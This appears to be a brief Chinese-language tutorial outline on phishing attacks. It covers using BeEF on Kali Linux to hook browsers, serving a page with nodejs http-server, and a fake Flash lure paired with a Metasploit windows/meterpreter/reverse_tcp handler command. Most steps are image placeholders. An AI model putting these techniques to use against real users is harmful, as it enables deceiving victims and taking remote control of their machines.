网络钓鱼攻击

可能需要的:kali Linux 切换镜像源

安装并启动

image-20240711083230622

利用 BeEF 进行网页钓鱼攻击

image-20240711084432017

利用 nodejs 开启静态服务

补充利用 nodejs 开启静态服务

1
2
sudo apt update
sudo apt install nodejs npm

安装完成后进入你的静态文件所在目录

开启命令行

1
http-server

image-20240711084857787

image-20240711085531378

成功上线

image-20240711085547978

发送警告命令

image-20240711085907974

通过 flash 钓鱼获取目标控制权

1
msf6 > handler -H 127.0.0.1 -P 4444 -p windows/meterpreter/reverse_tcp

image-20240711094156735

image-20240711094705116

image-20240711095518328

image-20240711095843697

image-20240711095854111

image-20240711101710871